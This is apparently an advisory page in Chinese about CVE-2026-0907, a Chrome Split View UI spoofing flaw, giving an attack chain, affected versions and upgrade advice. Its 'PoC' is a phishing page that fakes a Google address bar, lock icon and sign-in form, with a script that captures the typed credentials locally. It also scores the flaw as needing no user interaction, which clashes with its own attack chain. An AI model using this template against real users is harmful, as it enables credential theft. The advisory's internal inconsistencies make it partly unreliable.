IPBUF安全漏洞报告
English
CVE-2026-0907 CVSS 9.8 严重

CVE-2026-0907 Google Chrome Split View UI欺骗漏洞

披露日期: 2026-01-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-0907
漏洞类型
UI欺骗
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Google Chrome

相关标签

UI欺骗Google ChromeSplit ViewChromium浏览器漏洞安全UI界面伪装CVE-2026-0907

漏洞概述

CVE-2026-0907是Google Chrome中一个严重的UI欺骗漏洞。该漏洞存在于Chrome浏览器的Split View(分屏视图)功能中,由于对安全UI的正确性验证不足,攻击者可以通过精心构造的HTML页面欺骗用户,使其误以为自己正在访问合法的网站或执行安全的操作。攻击者利用此漏洞可以诱导用户输入敏感信息、点击恶意按钮或执行其他危险操作,而用户可能完全不知情。CVSS评分高达9.8,属于严重级别漏洞,对用户隐私和系统安全构成重大威胁。

技术细节

该漏洞的根本原因在于Google Chrome的Split View功能在处理页面内容时未能正确验证安全相关的UI元素。当用户在Split View模式下浏览网页时,恶意网页可以通过特定的HTML和CSS技术覆盖或伪装浏览器的安全指示器,如地址栏、证书信息、弹出警告等。由于Split View允许同时显示多个页面内容,攻击者可以创建一个看似合法的登录界面或安全提示,诱导用户输入凭据或执行敏感操作。攻击者可以利用DOM操作和CSS定位技术精确控制UI元素的显示位置和外观,从而实现复杂的欺骗攻击。

攻击链分析

STEP 1
步骤1
攻击者创建一个包含恶意HTML/CSS的网页,专门针对Chrome的Split View功能设计
STEP 2
步骤2
受害者使用Chrome浏览器并打开Split View模式访问攻击者控制的网站
STEP 3
步骤3
恶意页面通过CSS定位和DOM操作在视口上覆盖伪造的安全UI元素,包括地址栏、锁形图标和证书信息
STEP 4
步骤4
伪造的UI显示虚假的登录表单或安全提示,诱导用户输入敏感信息如用户名、密码或银行凭证
STEP 5
步骤5
用户误以为自己在合法的网站上输入凭据,攻击者通过JavaScript脚本窃取这些敏感信息

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2026-0907 UI Spoofing PoC --> <!-- This PoC demonstrates UI spoofing in Chrome Split View --> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>CVE-2026-0907 UI Spoofing PoC</title> <style> body { margin: 0; padding: 0; font-family: Arial, sans-serif; } .spoofed-ui { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 999999; background: rgba(255, 255, 255, 0.95); } .fake-toolbar { position: fixed; top: 0; left: 0; width: 100%; height: 60px; background: linear-gradient(to bottom, #f1f1f1, #e0e0e0); border-bottom: 1px solid #ccc; display: flex; align-items: center; padding: 0 15px; box-sizing: border-box; z-index: 1000000; } .fake-url-bar { flex: 1; height: 35px; background: white; border: 1px solid #dcdcdc; border-radius: 4px; display: flex; align-items: center; padding: 0 10px; font-size: 14px; color: #333; } .fake-lock-icon { margin-right: 8px; color: green; } .fake-content { margin-top: 80px; padding: 20px; } .fake-login-form { max-width: 400px; margin: 50px auto; padding: 30px; background: white; border: 1px solid #ddd; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); } input[type="text"], input[type="password"] { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 4px; box-sizing: border-box; } button { width: 100%; padding: 12px; background: #4285f4; color: white; border: none; border-radius: 4px; cursor: pointer; font-size: 16px; } button:hover { background: #3367d6; } </style> </head> <body> <div class="spoofed-ui"> <div class="fake-toolbar"> <div class="fake-url-bar"> <span class="fake-lock-icon">🔒</span> <span>https://www.google.com/accounts/signin</span> </div> </div> <div class="fake-content"> <div class="fake-login-form"> <h2 style="text-align:center; color:#333;">Sign in to Google</h2> <p style="text-align:center; color:#666;">To continue to legitimate-site.com</p> <input type="text" placeholder="Email or phone" id="email"> <input type="password" placeholder="Enter your password" id="password"> <button onclick="stealCredentials()">Sign In</button> </div> </div> </div> <script> function stealCredentials() { var email = document.getElementById('email').value; var password = document.getElementById('password').value; console.log('Stolen credentials - Email:', email, 'Password:', password); alert('Credentials captured by attacker!'); } </script> </body> </html>

影响范围

Google Chrome < 144.0.7559.59

防御指南

临时缓解措施
立即将Google Chrome升级到最新稳定版本(144.0.7559.59或更高)。如果无法立即升级,应避免在Split View模式下访问不受信任的网站,不要点击来源不明的链接,谨慎对待任何要求输入敏感信息的页面提示。对于高安全需求环境,可考虑暂时禁用Split View功能或使用其他浏览器。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表